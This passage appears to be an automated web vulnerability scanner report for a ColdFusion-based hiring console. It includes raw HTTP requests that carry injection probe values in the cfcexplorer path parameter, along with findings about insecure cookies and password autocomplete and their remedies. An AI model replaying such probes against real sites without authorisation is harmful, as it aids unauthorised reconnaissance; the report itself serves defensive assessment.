<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="12"><img src="../administrator/images/cap_content_white_main_bottom_left.gif" width="12" height="11"></td>
<td bgcolor="#FFFFFF"><img src="../administrator/images/spacer_10_x_10.gif" width="10" height="10"></td>
<td width="12"><img src="../administrator/images/cap_content_white_main_bottom_right.gif" width="12" height="11"></td>
</tr>
</table>

</td>
</tr>
</table>


</form>
</body>
</html>
- /CFIDE/componentutils/cfcexplorer.cfc/%2522ns%253D%2522netsparker%25280x000C98%2529)

/CFIDE/componentutils/cfcexplorer.cfc/%2522ns%253D%2522netsparker%25280x000C98%2529)

https://hourly.deploy.com/CFIDE/componentutils/cfcexplorer.cfc/%2522ns%253D%2522netsparker%25280x000..

Parameters

Parameter Type Value
method GET getcfcinhtml
name GET webservices.responseService
path GET /webservices/responseService.cfc/"ns="netsparker(0x000C98))
URI-BASED Raw URI /%22ns%3D%22netsparker%280x000C98%29)

Request

GET /CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=webservices.responseService&path=/webservices/responseService.cfc/%22ns=%22netsparker(0x000C98)) HTTP/1.1
Referer: https://hourly.deploy.com/webservices/responseService.cfc?method=insertResponseServiceData&question_id=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=2630aaffa7c9434d5d31
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:51:41 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_componentutils=;expires=Fri, 23-Jul-2010 16:51:41 GMT;path=/,CFAUTHORIZATION_componentutils=;expires=Fri, 23-Jul-2010 16:51:41 GMT;path=/
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:51:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8



<html>
<head>
<title>Component Browser Login</title>


<style>
body, p, td {
font-family: Arial, Helvetica, sans-serif;
font-size: x-small; ! important;
}

.errorText {
color: #CC0000;
}

.successText {
color: #008800;
}

.loginWhiteText {
color: #FFFFFF;
font-weight: bold;
}

.loginInvalidText {
color: #CC0000;
font-weight: bold;
}

.loginCopyrightText {
color: #999999;
font-size: x-small;
}

a {
color: #003399;
text-decoration: none;
}

a:hover {
color: #008A00;
}

.iconLinkText {
color: #FFFFFF;
font-weight: bold;
font-size: x-small;
}

.leftMenuLinkText {
color: #6C7A83;
font-size: x-small;
}

.topMenuLinkText {
color: #000000;
font-size: x-small;
}

.menuCFAdminText {
color: #FFFFFF;
font-weight: bold;
font-size: x-small;
}

.menuHeaderText {
color: #0072AC;
font-weight: bold;
font-size: x-small;
}

.menuTD {
border-top-width: 1px;
border-right-width: 1px;
border-bottom-width: 1px;
border-left-width: 1px;
border-top-style: none;
border-right-style: none;
border-bottom-style: solid;
border-left-style: none;
border-bottom-color: #CCCCCC;
}

h1 {
color: #000000;
font-weight: bold;
font-size: x-small;
margin-top: 5px;
margin-bottom: 5px;
}

.pageHeader {
color: #0072AC;
font-weight: bold;
font-size: medium; ! important;
margin-top: 5px;
margin-bottom: 5px;
}

.cellBlueSides {
border-right-width: 1px;
border-left-width: 1px;
border-right-style: solid;
border-left-style: solid;
border-right-color: #C1D9DB;
border-left-color: #C1D9DB;
}

.cellLeftBlueSide {
border-left-width: 1px;
border-left-style: solid;
border-left-color: #D5E3E6;
}

.cellRightAndBottomBlueSide {
border-right-width: 1px;
border-right-style: solid;
border-right-color: #D5E3E6;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #D5E3E6;
}

.cell3BlueSides {
border-left-width: 1px;
border-left-style: solid;
border-left-color: #D5E3E6;
border-right-width: 1px;
border-right-style: solid;
border-right-color: #D5E3E6;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #D5E3E6;
}

.cell4BlueSides {
border-top-width: 1px;
border-top-style: solid;
border-top-color: #D5E3E6;
border-left-width: 1px;
border-left-style: solid;
border-left-color: #D5E3E6;
border-right-width: 1px;
border-right-style: solid;
border-right-color: #D5E3E6;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #D5E3E6;
}

.cell2BlueSidesAndBlueBkgd {
border-top-width: 1px;
border-top-style: solid;
border-top-color: #D5E3E6;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #D5E3E6;
background-color: #E8F0F1;
}

.cellBlueTop {
border-top-width: 1px;
border-top-style: solid;
border-top-color: #C1D9DB;
border-bottom-width: none;
border-bottom-style: none;
border-bottom-color: none;
}

.cellBlueBottom {
border-top-width: none;
border-top-style: none;
border-top-color: none;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #C1D9DB;
}

.cellBlueTopAndBottom {
border-top-width: 1px;
border-top-style: solid;
border-top-color: #C1D9DB;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #C1D9DB;
}

.cellBordersBlue {
border: 1px solid #C1D9DB;
}

.cellGrayBottom {
border-top-width: none;
border-top-style: none;
border-top-color: none;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #E2E6E7;
}

.copyright {
color: #FFFFFF;
font-size: x-small;
}

.copyrightLink {
color: #FFFFCC;
font-size: x-small;
}
/*mnimer: added for the sanbox security formatting */
.color-title {background-color:888885;color:white;background-color:7A8FA4;}
.color-header {background-color:ddddd5;}
.color-buttons {background-color:ccccc5;}
.color-border {background-color:666666;}
.color-row {background-color:fffff5;}
.color-rowalert {background-color:ffddaa;}
.buttn,.buttnText {font-size:1em;font-family: tahoma,arial,Geneva,Helvetica,sans-serif;background-color:e0e0d5;}
</style>

<meta name="Author" content="Copyright 1996-2011 Macromedia Corp. All rights reserved.">
<script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script><script type="text/javascript" src="/CFIDE/scripts/masks.js"></script><script type="text/javascript"><!-- function _CF_checkloginform(_CF_this) { //reset on submit _CF_error_exists = false; _CF_error_messages = new Array(); _CF_error_fields = new Object(); _CF_FirstErrorField = null; //form element j_password required check if( !_CF_hasValue(_CF_this['j_password'], "PASSWORD", false ) ) { _CF_onError(_CF_this, "j_password", _CF_this['j_password'].value, "Password Required"); _CF_error_exists = true; } //display error messages and return success if( _CF_error_exists ) { if( _CF_error_messages.length > 0 ) { // show alert() message _CF_onErrorAlert(_CF_error_messages); // set focus to first form error, if the field supports js focus(). if( _CF_this[_CF_FirstErrorField].type == "text" ) { _CF_this[_CF_FirstErrorField].focus(); } } return false; }else { return true; } }//--></script></head>

<!-- frame buster - code by Gordon McComb -->
<script language="JavaScript" type="text/javascript">
<!-- Hide script from older browsers

function changePage()
{
if(top != self) top.location = document.location;
}

function openWin( windowURL, windowName, windowFeatures ) {
return window.open( windowURL, windowName, windowFeatures ) ;
}
function open_on_entrance(url,name)
{
new_window = window.open(url, name, ' menubar,scrollBars,resizable,dependent,status,width=525,height=300')
}
// -->
</script>
<body bgcolor="#6C7A83"
onload="changePage();document.forms.loginform.j_password.focus();">

<form name="loginform" action="/CFIDE/componentutils/cfcexplorer.cfc?METHOD=getcfcinhtml&NAME=webservices.responseService&PATH=/webservices/responseService.cfc/"ns="netsparker(0x000C98))" method="POST" onsubmit="return _CF_checkloginform(this)">
<br />





<table width="600" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
<td>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="12"><img src="../administrator/images/cap_content_white_main_top_left.gif" width="12" height="11"></td>
<td bgcolor="#FFFFFF"><img src="../administrator/images/spacer_10_x_10.gif" width="10" height="10"></td>
<td width="12"><img src="../administrator/images/cap_content_white_main_top_right.gif" width="12" height="11"></td>
</tr>
</table>

</td>
</tr>
<tr>
<td colspan="3" bgcolor="#FFFFFF" align="center">

<img src="../administrator/images/cflogo.gif" width="116" height="127">
<br /><br /><br />
<table width="100%" cellpadding="5">
<tr>
<td bgcolor="#F0F6F6" class="cellBlueTop" align="center">

<br>
<table width="400">
<tr>
<td>
<span class="loginCopyrightText">
Version: 7</strong><br />
Copyright (c) 1995-2005 Macromedia, Inc. All rights reserved
Macromedia, the Macromedia logo, Macromedia ColdFusion and ColdFusion are
trademarks or registered trademarks of Macromedia, Inc.
</span>
</td>
</tr>
</table>
<br>

</td>
</tr>
<tr>
<td align="center" bgcolor="#008CBE" class="loginWhiteText">
<center> Enter your RDS or Admin password below </center>
</th>
</tr>
<tr>
<td align="center" bgcolor="#F0F6F6" class="cellBlueBottom">

<input name="j_password_required" type="hidden" value="Password Required">
<input name="j_password" type="password" maxlength="100" size="15" class="label" id="admin_login" />
&nbsp;

<input name="submit" type="submit" value="Login" class="buttn-fix">
</td>
</tr>


</table>

</td>
</tr>

<tr>
<td>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="12"><img src="../administrator/images/cap_content_white_main_bottom_left.gif" width="12" height="11"></td>
<td bgcolor="#FFFFFF"><img src="../administrator/images/spacer_10_x_10.gif" width="10" height="10"></td>
<td width="12"><img src="../administrator/images/cap_content_white_main_bottom_right.gif" width="12" height="11"></td>
</tr>
</table>

</td>
</tr>
</table>


</form>
</body>
</html>
- /CFIDE/componentutils/cfcexplorer.cfc/%2522ns%253D%2522netsparker%25280x000C99%2529)

/CFIDE/componentutils/cfcexplorer.cfc/%2522ns%253D%2522netsparker%25280x000C99%2529)

https://hourly.deploy.com/CFIDE/componentutils/cfcexplorer.cfc/%2522ns%253D%2522netsparker%25280x000..

Parameters

Parameter Type Value
method GET getcfcinhtml
name GET webservices.localeService
path GET /webservices/localeService.cfc/"ns="netsparker(0x000C99))
URI-BASED Raw URI /%22ns%3D%22netsparker%280x000C99%29)

Request

GET /CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=webservices.localeService&path=/webservices/localeService.cfc/%22ns=%22netsparker(0x000C99)) HTTP/1.1
Referer: https://hourly.deploy.com/webservices/localeService.cfc?method=getLocalByQuestionIDServiceData&questionID=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=2630aaffa7c9434d5d31
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:52:05 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_componentutils=;expires=Fri, 23-Jul-2010 16:52:05 GMT;path=/,CFAUTHORIZATION_componentutils=;expires=Fri, 23-Jul-2010 16:52:05 GMT;path=/
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:52:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8



<html>
<head>
<title>Component Browser Login</title>


<style>
body, p, td {
font-family: Arial, Helvetica, sans-serif;
font-size: x-small; ! important;
}

.errorText {
color: #CC0000;
}

.successText {
color: #008800;
}

.loginWhiteText {
color: #FFFFFF;
font-weight: bold;
}

.loginInvalidText {
color: #CC0000;
font-weight: bold;
}

.loginCopyrightText {
color: #999999;
font-size: x-small;
}

a {
color: #003399;
text-decoration: none;
}

a:hover {
color: #008A00;
}

.iconLinkText {
color: #FFFFFF;
font-weight: bold;
font-size: x-small;
}

.leftMenuLinkText {
color: #6C7A83;
font-size: x-small;
}

.topMenuLinkText {
color: #000000;
font-size: x-small;
}

.menuCFAdminText {
color: #FFFFFF;
font-weight: bold;
font-size: x-small;
}

.menuHeaderText {
color: #0072AC;
font-weight: bold;
font-size: x-small;
}

.menuTD {
border-top-width: 1px;
border-right-width: 1px;
border-bottom-width: 1px;
border-left-width: 1px;
border-top-style: none;
border-right-style: none;
border-bottom-style: solid;
border-left-style: none;
border-bottom-color: #CCCCCC;
}

h1 {
color: #000000;
font-weight: bold;
font-size: x-small;
margin-top: 5px;
margin-bottom: 5px;
}

.pageHeader {
color: #0072AC;
font-weight: bold;
font-size: medium; ! important;
margin-top: 5px;
margin-bottom: 5px;
}

.cellBlueSides {
border-right-width: 1px;
border-left-width: 1px;
border-right-style: solid;
border-left-style: solid;
border-right-color: #C1D9DB;
border-left-color: #C1D9DB;
}

.cellLeftBlueSide {
border-left-width: 1px;
border-left-style: solid;
border-left-color: #D5E3E6;
}

.cellRightAndBottomBlueSide {
border-right-width: 1px;
border-right-style: solid;
border-right-color: #D5E3E6;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #D5E3E6;
}

.cell3BlueSides {
border-left-width: 1px;
border-left-style: solid;
border-left-color: #D5E3E6;
border-right-width: 1px;
border-right-style: solid;
border-right-color: #D5E3E6;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #D5E3E6;
}

.cell4BlueSides {
border-top-width: 1px;
border-top-style: solid;
border-top-color: #D5E3E6;
border-left-width: 1px;
border-left-style: solid;
border-left-color: #D5E3E6;
border-right-width: 1px;
border-right-style: solid;
border-right-color: #D5E3E6;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #D5E3E6;
}

.cell2BlueSidesAndBlueBkgd {
border-top-width: 1px;
border-top-style: solid;
border-top-color: #D5E3E6;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #D5E3E6;
background-color: #E8F0F1;
}

.cellBlueTop {
border-top-width: 1px;
border-top-style: solid;
border-top-color: #C1D9DB;
border-bottom-width: none;
border-bottom-style: none;
border-bottom-color: none;
}

.cellBlueBottom {
border-top-width: none;
border-top-style: none;
border-top-color: none;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #C1D9DB;
}

.cellBlueTopAndBottom {
border-top-width: 1px;
border-top-style: solid;
border-top-color: #C1D9DB;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #C1D9DB;
}

.cellBordersBlue {
border: 1px solid #C1D9DB;
}

.cellGrayBottom {
border-top-width: none;
border-top-style: none;
border-top-color: none;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #E2E6E7;
}

.copyright {
color: #FFFFFF;
font-size: x-small;
}

.copyrightLink {
color: #FFFFCC;
font-size: x-small;
}
/*mnimer: added for the sanbox security formatting */
.color-title {background-color:888885;color:white;background-color:7A8FA4;}
.color-header {background-color:ddddd5;}
.color-buttons {background-color:ccccc5;}
.color-border {background-color:666666;}
.color-row {background-color:fffff5;}
.color-rowalert {background-color:ffddaa;}
.buttn,.buttnText {font-size:1em;font-family: tahoma,arial,Geneva,Helvetica,sans-serif;background-color:e0e0d5;}
</style>

<meta name="Author" content="Copyright 1996-2011 Macromedia Corp. All rights reserved.">
<script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script><script type="text/javascript" src="/CFIDE/scripts/masks.js"></script><script type="text/javascript"><!-- function _CF_checkloginform(_CF_this) { //reset on submit _CF_error_exists = false; _CF_error_messages = new Array(); _CF_error_fields = new Object(); _CF_FirstErrorField = null; //form element j_password required check if( !_CF_hasValue(_CF_this['j_password'], "PASSWORD", false ) ) { _CF_onError(_CF_this, "j_password", _CF_this['j_password'].value, "Password Required"); _CF_error_exists = true; } //display error messages and return success if( _CF_error_exists ) { if( _CF_error_messages.length > 0 ) { // show alert() message _CF_onErrorAlert(_CF_error_messages); // set focus to first form error, if the field supports js focus(). if( _CF_this[_CF_FirstErrorField].type == "text" ) { _CF_this[_CF_FirstErrorField].focus(); } } return false; }else { return true; } }//--></script></head>

<!-- frame buster - code by Gordon McComb -->
<script language="JavaScript" type="text/javascript">
<!-- Hide script from older browsers

function changePage()
{
if(top != self) top.location = document.location;
}

function openWin( windowURL, windowName, windowFeatures ) {
return window.open( windowURL, windowName, windowFeatures ) ;
}
function open_on_entrance(url,name)
{
new_window = window.open(url, name, ' menubar,scrollBars,resizable,dependent,status,width=525,height=300')
}
// -->
</script>
<body bgcolor="#6C7A83"
onload="changePage();document.forms.loginform.j_password.focus();">

<form name="loginform" action="/CFIDE/componentutils/cfcexplorer.cfc?NAME=webservices.localeService&PATH=/webservices/localeService.cfc/"ns="netsparker(0x000C99))&METHOD=getcfcinhtml" method="POST" onsubmit="return _CF_checkloginform(this)">
<br />





<table width="600" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
<td>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="12"><img src="../administrator/images/cap_content_white_main_top_left.gif" width="12" height="11"></td>
<td bgcolor="#FFFFFF"><img src="../administrator/images/spacer_10_x_10.gif" width="10" height="10"></td>
<td width="12"><img src="../administrator/images/cap_content_white_main_top_right.gif" width="12" height="11"></td>
</tr>
</table>

</td>
</tr>
<tr>
<td colspan="3" bgcolor="#FFFFFF" align="center">

<img src="../administrator/images/cflogo.gif" width="116" height="127">
<br /><br /><br />
<table width="100%" cellpadding="5">
<tr>
<td bgcolor="#F0F6F6" class="cellBlueTop" align="center">

<br>
<table width="400">
<tr>
<td>
<span class="loginCopyrightText">
Version: 7</strong><br />
Copyright (c) 1995-2005 Macromedia, Inc. All rights reserved
Macromedia, the Macromedia logo, Macromedia ColdFusion and ColdFusion are
trademarks or registered trademarks of Macromedia, Inc.
</span>
</td>
</tr>
</table>
<br>

</td>
</tr>
<tr>
<td align="center" bgcolor="#008CBE" class="loginWhiteText">
<center> Enter your RDS or Admin password below </center>
</th>
</tr>
<tr>
<td align="center" bgcolor="#F0F6F6" class="cellBlueBottom">

<input name="j_password_required" type="hidden" value="Password Required">
<input name="j_password" type="password" maxlength="100" size="15" class="label" id="admin_login" />
&nbsp;

<input name="submit" type="submit" value="Login" class="buttn-fix">
</td>
</tr>


</table>

</td>
</tr>

<tr>
<td>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="12"><img src="../administrator/images/cap_content_white_main_bottom_left.gif" width="12" height="11"></td>
<td bgcolor="#FFFFFF"><img src="../administrator/images/spacer_10_x_10.gif" width="10" height="10"></td>
<td width="12"><img src="../administrator/images/cap_content_white_main_bottom_right.gif" width="12" height="11"></td>
</tr>
</table>

</td>
</tr>
</table>


</form>
</body>
</html>
Cookie Not Marked As Secure

Cookie Not Marked As Secure

1 TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

  1. See the remedy for solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.
- /hmc/report/

/hmc/report/ CONFIRMED

https://hourly.deploy.com/hmc/report/

Identified Cookie

JSESSIONID

Request

GET /hmc/report/ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/index.cfm?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:44:12 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=26308ca481c67d73137f;path=/,CFAUTHORIZATION_hmc5_prod_delroy=;expires=Fri, 23-Jul-2010 16:44:12 GMT;path=/,CFAUTHORIZATION_hmc5_prod_delroy=;expires=Fri, 23-Jul-2010 16:44:12 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:44:12 GMT
Connection: close
Content-Type: text/html; charset=UTF-8







































































































































































































































































































































































































































<html><head><title>Login</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><link href="/styles/albertson2_3_production_Sep24/hmc.css" rel="stylesheet" type="text/css"><script src="../javascript/display.js" type="text/javascript"></script></head><body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666"> <form name="form1" action="/hmc/report/index.cfm?" method="post"><p>&nbsp;</p>

<TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="340"><!-- RoundedBox Table -->

<TR>
<TD class="FlexBox_ul"></TD>
<TD class="FlexBox_top"></TD>
<TD class="FlexBox_ur"></TD>
</TR>

<TR>
<TD class="FlexBox_left"></TD>
<TD class="FlexBoxContent">



<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td height="86" align="center"> <a href="http://www.deploy.com"><img src="/images/logo.jpg" border="0"></a> </td> </tr> <tr> <td height="46" class="formCopy" align="center"> <br/> Welcome to<strong> Kronos Hiring Management Console</strong>.<br/> <br/> Please enter your username and password. <br> <br/> New user? <a href="?register=1">Click here</a> to register. <br/> </td> </tr> <tr> <td height="155" align="center"> <script> function checkEnter() { if (window.event.keyCode == 13) /* they hit enter */ document.form1.submit(); } </script> <table border="0" cellpadding="3" cellspacing="0" width="300" height="100"> <tbody> <tr> <td class="fieldLabel">Username:</td> <td><input name="j_username" type="text" tabindex="1" title="Username" size="25" maxlength="50" value="" onKeyPress="checkEnter();"></td> </tr> <tr> <td width="100" class="fieldLabel">Password:</td> <td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td> </tr> <tr> <td colspan="2" height="20" align="center">

<table id="loginBtn" class="Button" height="19" border="0" cellpadding="0" cellspacing="0" align="center">

<tr>
<td class="flexbtn_l"></td>
<td class="flexbtn_m" nowrap>

<a access= "1" class="flexbtn_m" tabindex="3" href="javascript:document.form1.submit();"

title="Login&nbsp;>" >


&nbsp;&nbsp;Login&nbsp;>&nbsp;&nbsp;



</a>
</td>
<td class="flexbtn_r"></td>
</tr>

</table>
</td> </tr> </tbody> </form> </table> </td> </tr> </table> </td> </tr></table>

</TD>
<TD class="FlexBox_right"></TD>
</TR>

<TR>
<TD class="FlexBox_ll"></TD>
<TD class="FlexBox_bot"></TD>
<TD class="FlexBox_lr"></TD>
</TR>
</TABLE>



<p>&nbsp;</p></body></html>
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /hmc/report/

/hmc/report/ CONFIRMED

https://hourly.deploy.com/hmc/report/

Identified Field Name

j_password

Request

GET /hmc/report/ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/index.cfm?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:44:12 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=26308ca481c67d73137f;path=/,CFAUTHORIZATION_hmc5_prod_delroy=;expires=Fri, 23-Jul-2010 16:44:12 GMT;path=/,CFAUTHORIZATION_hmc5_prod_delroy=;expires=Fri, 23-Jul-2010 16:44:12 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:44:12 GMT
Connection: close
Content-Type: text/html; charset=UTF-8







































































































































































































































































































































































































































<html><head><title>Login</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><link href="/styles/albertson2_3_production_Sep24/hmc.css" rel="stylesheet" type="text/css"><script src="../javascript/display.js" type="text/javascript"></script></head><body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666"> <form name="form1" action="/hmc/report/index.cfm?" method="post"><p>&nbsp;</p>

<TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="340"><!-- RoundedBox Table -->

<TR>
<TD class="FlexBox_ul"></TD>
<TD class="FlexBox_top"></TD>
<TD class="FlexBox_ur"></TD>
</TR>

<TR>
<TD class="FlexBox_left"></TD>
<TD class="FlexBoxContent">



<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td height="86" align="center"> <a href="http://www.deploy.com"><img src="/images/logo.jpg" border="0"></a> </td> </tr> <tr> <td height="46" class="formCopy" align="center"> <br/> Welcome to<strong> Kronos Hiring Management Console</strong>.<br/> <br/> Please enter your username and password. <br> <br/> New user? <a href="?register=1">Click here</a> to register. <br/> </td> </tr> <tr> <td height="155" align="center"> <script> function checkEnter() { if (window.event.keyCode == 13) /* they hit enter */ document.form1.submit(); } </script> <table border="0" cellpadding="3" cellspacing="0" width="300" height="100"> <tbody> <tr> <td class="fieldLabel">Username:</td> <td><input name="j_username" type="text" tabindex="1" title="Username" size="25" maxlength="50" value="" onKeyPress="checkEnter();"></td> </tr> <tr> <td width="100" class="fieldLabel">Password:</td> <td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td> </tr> <tr> <td colspan="2" height="20" align="center">

<table id="loginBtn" class="Button" height="19" border="0" cellpadding="0" cellspacing="0" align="center">

<tr>
<td class="flexbtn_l"></td>
<td class="flexbtn_m" nowrap>

<a access= "1" class="flexbtn_m" tabindex="3" href="javascript:document.form1.submit();"

title="Login&nbsp;>" >


&nbsp;&nbsp;Login&nbsp;>&nbsp;&nbsp;



</a>
</td>
<td class="flexbtn_r"></td>
</tr>

</table>
</td> </tr> </tbody> </form> </table> </td> </tr> </table> </td> </tr></table>

</TD>
<TD class="FlexBox_right"></TD>
</TR>

<TR>
<TD class="FlexBox_ll"></TD>
<TD class="FlexBox_bot"></TD>
<TD class="FlexBox_lr"></TD>
</TR>
</TABLE>



<p>&nbsp;</p></body></html>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /hmc/report/

/hmc/report/ CONFIRMED

https://hourly.deploy.com/hmc/report/

Identified Cookie

JSESSIONID

Request

GET /hmc/report/ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/index.cfm?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:44:12 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=26308ca481c67d73137f;path=/,CFAUTHORIZATION_hmc5_prod_delroy=;expires=Fri, 23-Jul-2010 16:44:12 GMT;path=/,CFAUTHORIZATION_hmc5_prod_delroy=;expires=Fri, 23-Jul-2010 16:44:12 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:44:12 GMT
Connection: close
Content-Type: text/html; charset=UTF-8







































































































































































































































































































































































































































<html><head><title>Login</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><link href="/styles/albertson2_3_production_Sep24/hmc.css" rel="stylesheet" type="text/css"><script src="../javascript/display.js" type="text/javascript"></script></head><body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666"> <form name="form1" action="/hmc/report/index.cfm?" method="post"><p>&nbsp;</p>

<TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="340"><!-- RoundedBox Table -->

<TR>
<TD class="FlexBox_ul"></TD>
<TD class="FlexBox_top"></TD>
<TD class="FlexBox_ur"></TD>
</TR>

<TR>
<TD class="FlexBox_left"></TD>
<TD class="FlexBoxContent">



